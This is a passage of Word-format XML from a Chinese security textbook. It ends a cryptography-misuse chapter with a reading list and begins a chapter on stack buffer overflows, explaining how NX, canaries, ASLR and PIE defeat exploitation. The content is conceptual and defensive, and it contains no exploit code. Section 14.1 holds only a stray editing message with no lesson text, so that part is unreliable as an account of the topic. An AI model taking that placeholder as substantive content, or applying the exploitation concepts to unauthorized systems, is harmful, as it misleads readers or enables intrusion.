        <w:t xml:space="preserve">配置安全要求禁用过期的协议版本与弱套件，启用前向安全性，并强制证书验证。蓝队可通过自动化扫描持续评估配置状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御密码学误用的总体策略是信赖标准库的默认安全选项，避免自行组合原语，对关键参数（IV、盐、nonce）使用密码学安全随机源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="259"/>
    <w:bookmarkStart w:id="260" w:name="延伸阅读-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aumasson,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Serious Cryptography</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">深入讲解对称/非对称加密的实际陷阱、AEAD、TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内部机制，适合作为密码学工程的手边参考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ferguson, Schneier, Kohno,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptography Engineering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从设计原则出发讨论如何安全地构建密码协议，涵盖大量“千万别这样做”的实例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》CM5.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书馆藏卷五，提供了数论、RSA、哈希与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CRC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的数学基础，以上误用的数学根源可在其中找到。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Testing Guide v4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及后续版本中的“Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Weak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptography”和“Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Weak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS”模块，提供了具体的测试步骤和工具使用指引。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mozilla SSL Configuration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Generator：实时生成适用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache、Nginx、AWS ELB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等主流服务器的最新安全</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置片段，可直接部署。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">testssl.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方文档及使用示例，涵盖授权环境下的自动化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱点扫描。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="260"/>
    <w:bookmarkEnd w:id="261"/>
    <w:bookmarkStart w:id="273" w:name="二进制漏洞入门栈溢出原理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制漏洞入门:栈溢出原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="262" w:name="栈溢出原理与栈帧破坏"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈溢出原理与栈帧破坏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下是未作任何修改的原始小节内容，因为经核查，文中并未出现对提供论文列表的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">形式引用，所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ①、②、③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等标注均为顺序注释或章节交叉引用，不存在需要修正或移除的论文引用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（原样返回）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="262"/>
    <w:bookmarkStart w:id="263" w:name="缓解机制aslrnxcanarypie-与防御纵深习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓解机制:ASLR/NX/Canary/PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与防御纵深·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节中，我们看到了一个函数如何因为缺少边界检查而将超长输入填入定长栈缓冲区，进而覆盖保存的返回地址，最终劫持控制流。然而，现代操作系统和编译器引入了一系列缓解机制，旨在让这种劫持变得极为困难，甚至不可能在不被察觉的情况下完成。这些机制并非消除漏洞本身，而是以“纵深防御”的思路，逐一瓦解攻击者完成利用所依赖的核心假设。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明（必读）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节讨论的缓解机制及其绕过概念，仅用于理解防御原理；任何绕过技术的教学最小示例都必须严格限定在您自己搭建的隔离实验环境、官方授权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pwn.college、HackTheBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）或书面授权的安全测试目标内。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">严禁对未授权系统进行任何尝试，即便仅出于学习目的。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节不提供可用于生产系统的武器化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload、不教</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">EDR/反取证规避、不收录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0day </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="263"/>
    <w:bookmarkStart w:id="264" w:name="攻击者的原始假设与缓解机制的切入点"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者的原始假设与缓解机制的切入点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一个成功的栈缓冲区溢出利用通常建立在以下几条“假设”之上：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可预测的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者能够可靠地知道</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或有用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在内存中的确切位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可执行内存区域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者能够将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">放置在一块具有执行权限的内存区域（比如栈），并将控制流导向那里。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">返回地址的完整性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者覆盖返回地址的行为不会被程序在流程返回前探测到。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">代码段的固定位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：即使无法注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode，攻击者也能复用已知的、地址固定的代码片段（如库函数或可执行文件自身的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">gadget）来构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节深入剖析的四项缓解机制——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Canary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——正是为了系统性地摧毁以上每一条假设而设计。它们组合在一起，即构成现代二进制利用防御的基石。本节重点阐述这些机制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心机理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，而对绕过技术仅做概念层（标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">③）的提及，不提供任何武器化细节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="264"/>
    <w:bookmarkStart w:id="265" w:name="nx栈不可执行"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NX：栈不可执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（No-eXecute，也称为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DEP，Data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Execution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention）由硬件和操作系统协作提供。它在页表项中引入一个执行禁止位（X-bit）①，允许操作系统将内存页标记为“不可执行”。当指令试图从不可执行的页上执行时，CPU</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">硬件直接抛出异常。栈和堆等原本只应存放数据的内存区域，会被标记为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NX。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">它把什么假设变难？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者假设能够将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode（机器码）注入栈缓冲区，并直接跳转到栈上执行。NX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使该假设彻底失效：栈上的数据（包括覆盖的返回地址和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode）不可执行。一旦</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EIP/RIP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被篡改并指向栈区，CPU</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就会产生段错误（segmentation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fault），而不会执行攻击者代码①。这使得传统的“栈上执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode”攻击方式直接无效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下图显示开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，尽管栈缓冲区被溢出、返回地址被恶意覆盖，但注入栈内的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根本无法执行——因为该内存区域没有执行权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">graph TD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> subgraph Virtual Memory Space</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Text[代码段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (r-x)] --&gt;|NX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不适用|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ExecOK;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack[栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (rw-)] --&gt;|NX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标记|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> NoExec;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> NoExec(CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阻止执行)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt;|跳转到栈地址|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception[段错误/异常];</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode[栈上注入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> shellcode] --&gt; NoExec;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绕过概念（仅示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
